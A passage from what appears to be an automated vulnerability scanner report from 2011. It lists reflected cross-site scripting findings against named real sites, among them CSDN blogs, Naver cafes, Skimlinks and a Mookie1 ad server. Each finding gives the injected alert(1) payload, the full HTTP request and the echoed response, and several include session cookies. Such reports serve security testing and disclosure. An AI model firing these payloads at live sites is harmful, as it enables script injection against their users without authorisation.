The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3541f'style%3d'x%3aexpression(alert(1))'7b381ee316b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3541f'style='x:expression(alert(1))'7b381ee316b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /jiji262/archive/2007/07/28/1713771.aspx?3541f'style%3d'x%3aexpression(alert(1))'7b381ee316b=1 HTTP/1.1
Host: blog.csdn.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.68
Date: Wed, 09 Feb 2011 13:28:01 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Length: 64116


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<a href='m&#97;ilto&#58;webmaster&#64;csdn&#46;net?subject=Article%20Report!!!&body=Author:jiji262%0D%0AURL:http://blog.csdn.net/ArticleContent.aspx?UserName=jiji262&Entryid=1713771&3541f'style='x:expression(alert(1))'7b381ee316b=1'>
...[SNIP]...

1.83. http://blog.csdn.net/jiji262/archive/2007/08/12/1739715.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.csdn.net
Path:   /jiji262/archive/2007/08/12/1739715.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e0cf4'style%3d'x%3aexpression(alert(1))'3d59d223c0b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e0cf4'style='x:expression(alert(1))'3d59d223c0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /jiji262/archive/2007/08/12/1739715.aspx?e0cf4'style%3d'x%3aexpression(alert(1))'3d59d223c0b=1 HTTP/1.1
Host: blog.csdn.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.68
Date: Wed, 09 Feb 2011 13:28:02 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Length: 39967


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<a href='m&#97;ilto&#58;webmaster&#64;csdn&#46;net?subject=Article%20Report!!!&body=Author:jiji262%0D%0AURL:http://blog.csdn.net/ArticleContent.aspx?UserName=jiji262&Entryid=1739715&e0cf4'style='x:expression(alert(1))'3d59d223c0b=1'>
...[SNIP]...

1.84. http://cafe.naver.com/javamaker.cafe [iframe_url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cafe.naver.com
Path:   /javamaker.cafe

Issue detail

The value of the iframe_url request parameter is copied into the value of a tag attribute which can contain JavaScript. The payload javascript%3aalert(1)//7c86965c was submitted in the iframe_url parameter. This input was echoed as javascript:alert(1)//7c86965c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /javamaker.cafe?iframe_url=javascript%3aalert(1)//7c86965c HTTP/1.1
Host: cafe.naver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:41:13 GMT
Server: Apache/2.2.15 (Unix) mod_jk/1.2.28
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: nci4=""; Domain=.cafe.naver.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: nci4=467490b5ace3823c638dcaddd022533d8ad426ce95d605d60ceee30193a753b655bf6bbb4d7fc8c284155c8560c647b911393403d9d1b1968261f765d5ea7791c8eef4fbdafdce808dfff2d5f5c696e3efc7e2d39aebe6c1d8e9da49; Domain=.cafe.naver.com; Path=/
Set-Cookie: ncvid=#vid#_173.193.214.243G6zj; Domain=.cafe.naver.com; Expires=Mon, 27-Feb-2079 16:55:20 GMT; Path=/
Set-Cookie: ncvc2=b8d82004506667d3fc017f46718aec96337b997d2f0f9f0ee26040912b04ed21e00cce15cdef7d5624bae03f8ecb; Domain=.cafe.naver.com; Expires=Wed, 09-Feb-2011 14:11:13 GMT; Path=/
Set-Cookie: ncvid=#vid#_173.193.214.243tQIg; Domain=.cafe.naver.com; Expires=Mon, 27-Feb-2079 16:55:20 GMT; Path=/
Set-Cookie: JSESSIONID=ADF43B6DFCF956425C622250F73D6534; Path=/
P3P: CP="ALL CURa ADMa DEVa TAIa OUR BUS IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC OTC"
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html;charset=ks_c_5601-1987
Content-Length: 95808

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=KSC5601">
<title>J
...[SNIP]...
<iframe name="cafe_main" id="cafe_main" src="javascript:alert(1)//7c86965c?clubid=16593684" width="773" height="100%" frameborder="0" scrolling="no" marginwidth="0" marginheight="0" allowtransparency="true">
...[SNIP]...

1.85. http://cafe.naver.com/specialj.cafe [iframe_url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cafe.naver.com
Path:   /specialj.cafe

Issue detail

The value of the iframe_url request parameter is copied into the value of a tag attribute which can contain JavaScript. The payload javascript%3aalert(1)//112db26c was submitted in the iframe_url parameter. This input was echoed as javascript:alert(1)//112db26c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /specialj.cafe?iframe_url=javascript%3aalert(1)//112db26c HTTP/1.1
Host: cafe.naver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:41:08 GMT
Server: Apache/2.2.15 (Unix) mod_jk/1.2.28
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: nci4=""; Domain=.cafe.naver.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: nci4=2412f2dacf85ec5201efa8bfb259204ceab244abf886699248bc47d9296a90567676b612b673034a20bf7748f02bd29213b783036741d3f4e003954095a44f8c949bbe99ae9e929db493a0ef9994ac8fbd948e81a087b4f8b4bb9ebe8cc3beb691b59ad5a6a988af9cad59; Domain=.cafe.naver.com; Path=/
Set-Cookie: ncvid=#vid#_173.193.214.24362Fm; Domain=.cafe.naver.com; Expires=Mon, 27-Feb-2079 16:55:15 GMT; Path=/
Set-Cookie: ncvc2=b8d82004506667d3fc017f46718aec96337b997d2f7e9b32e56040952b09ec25ec00ce15cdef7d5624bae03f8e69; Domain=.cafe.naver.com; Expires=Wed, 09-Feb-2011 14:11:08 GMT; Path=/
Set-Cookie: ncvid=#vid#_173.193.214.243C3CS; Domain=.cafe.naver.com; Expires=Mon, 27-Feb-2079 16:55:15 GMT; Path=/
Set-Cookie: JSESSIONID=5657F168F3E9FB9976315CE3CDBBB602; Path=/
P3P: CP="ALL CURa ADMa DEVa TAIa OUR BUS IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC OTC"
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html;charset=ks_c_5601-1987
Content-Length: 81682

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=KSC5601">
<title>.
...[SNIP]...
<iframe name="cafe_main" id="cafe_main" src="javascript:alert(1)//112db26c?clubid=12542248" width="773" height="100%" frameborder="0" scrolling="no" marginwidth="0" marginheight="0" allowtransparency="true">
...[SNIP]...

1.86. http://d.skimresources.com/api/index.php [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.skimresources.com
Path:   /api/index.php

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 897d0<script>alert(1)</script>ffdf231be2f was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/index.php?callback=skimwordsDataCallback897d0<script>alert(1)</script>ffdf231be2f&data=%7B%22page%22%3A%22http%3A%2F%2Ftechnorati.com%2F%22%7D HTTP/1.1
Host: d.skimresources.com
Proxy-Connection: keep-alive
Referer: http://technorati.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: skimGUID=6870A8E5A2DABB0C248AD2A4AAF369FF

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Wed, 09 Feb 2011 14:08:08 GMT
Server: Apache
X-Powered-By: PHP/5.3.2
Content-Length: 398
Connection: keep-alive

skimwordsDataCallback897d0<script>alert(1)</script>ffdf231be2f({"words":[],"includes":[],"excludes":[],"maxkeywords":0,"impression":1,"reindex":0,"thispage":"http:\/\/technorati.com\/","original_length":0,"useragent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-
...[SNIP]...

1.87. http://dm.de.mookie1.com/2/B3DM/2010DM/11256086249@x23 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11256086249@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53335"><script>alert(1)</script>d5e2383b59e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM53335"><script>alert(1)</script>d5e2383b59e/2010DM/11256086249@x23?USNetwork/FarmB_2011Q1_RocketF_BTRT1_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259897490@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:59:23 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM53335"><script>alert(1)</script>d5e2383b59e/2010DM/1132110277/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.88. http://dm.de.mookie1.com/2/B3DM/2010DM/11256086249@x23 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11256086249@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3c29"><script>alert(1)</script>92b43a2f943 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMe3c29"><script>alert(1)</script>92b43a2f943/11256086249@x23?USNetwork/FarmB_2011Q1_RocketF_BTRT1_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259897490@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:59:25 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMe3c29"><script>alert(1)</script>92b43a2f943/336196242/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

1.89. http://dm.de.mookie1.com/2/B3DM/2010DM/11256086249@x23 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11256086249@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1150b"><script>alert(1)</script>a68df653d3d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/11256086249@x231150b"><script>alert(1)</script>a68df653d3d?USNetwork/FarmB_2011Q1_RocketF_BTRT1_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259897490@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:59:28 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5345525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1807529050/x231150b"><script>alert(1)</script>a68df653d3d/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.90. http://dm.de.mookie1.com/2/B3DM/2010DM/11311693468@x23 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11311693468@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68a03"><script>alert(1)</script>dd801c10d99 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM68a03"><script>alert(1)</script>dd801c10d99/2010DM/11311693468@x23?USNetwork/FarmB_2011Q1_RocketF_BTRT1_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259930614@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011PnAYfG102PB|E106w2|U106y5|G10C7a|G10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660; other_20110126=set; dlx_XXX=set; dlx_20100929=set; session=1297259893|1297260360

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 14:30:04 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM68a03"><script>alert(1)</script>dd801c10d99/2010DM/265696778/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

1.91. http://dm.de.mookie1.com/2/B3DM/2010DM/11311693468@x23 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11311693468@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fa85"><script>alert(1)</script>e0cd33b110 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM8fa85"><script>alert(1)</script>e0cd33b110/11311693468@x23?USNetwork/FarmB_2011Q1_RocketF_BTRT1_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259930614@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011PnAYfG102PB|E106w2|U106y5|G10C7a|G10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660; other_20110126=set; dlx_XXX=set; dlx_20100929=set; session=1297259893|1297260360

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 14:30:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 332
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM8fa85"><script>alert(1)</script>e0cd33b110/245402735/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IM
...[SNIP]...

1.92. http://dm.de.mookie1.com/2/B3DM/2010DM/11311693468@x23 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11311693468@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad727"><script>alert(1)</script>6653daacdbc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/11311693468@x23ad727"><script>alert(1)</script>6653daacdbc?USNetwork/FarmB_2011Q1_RocketF_BTRT1_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259930614@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011PnAYfG102PB|E106w2|U106y5|G10C7a|G10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660; other_20110126=set; dlx_XXX=set; dlx_20100929=set; session=1297259893|1297260360

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 14:30:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/2104859421/x23ad727"><script>alert(1)</script>6653daacdbc/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.93. http://dm.de.mookie1.com/2/B3DM/2010DM/11343771873@x23 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11343771873@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a66af"><script>alert(1)</script>642529e6013 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DMa66af"><script>alert(1)</script>642529e6013/2010DM/11343771873@x23?USNetwork/FarmB_2011Q1_RocketF_BTRT1_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259930614@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011PnAYfG102PB|E106w2|U106y5|G10C7a|G10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; session=1297259893|1297261770; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 14:49:27 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6c45525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DMa66af"><script>alert(1)</script>642529e6013/2010DM/1169820156/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.94. http://dm.de.mookie1.com/2/B3DM/2010DM/11343771873@x23 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11343771873@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 941ca"><script>alert(1)</script>56840368bce was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM941ca"><script>alert(1)</script>56840368bce/11343771873@x23?USNetwork/FarmB_2011Q1_RocketF_BTRT1_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259930614@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011PnAYfG102PB|E106w2|U106y5|G10C7a|G10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; session=1297259893|1297261770; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 14:49:41 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM941ca"><script>alert(1)</script>56840368bce/1264660409/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.95. http://dm.de.mookie1.com/2/B3DM/2010DM/11343771873@x23 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11343771873@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6122"><script>alert(1)</script>5136673dd89 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/11343771873@x23e6122"><script>alert(1)</script>5136673dd89?USNetwork/FarmB_2011Q1_RocketF_BTRT1_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259930614@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
